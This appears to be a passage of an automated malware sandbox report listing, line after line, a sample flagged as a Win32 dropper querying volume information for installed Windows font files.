                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
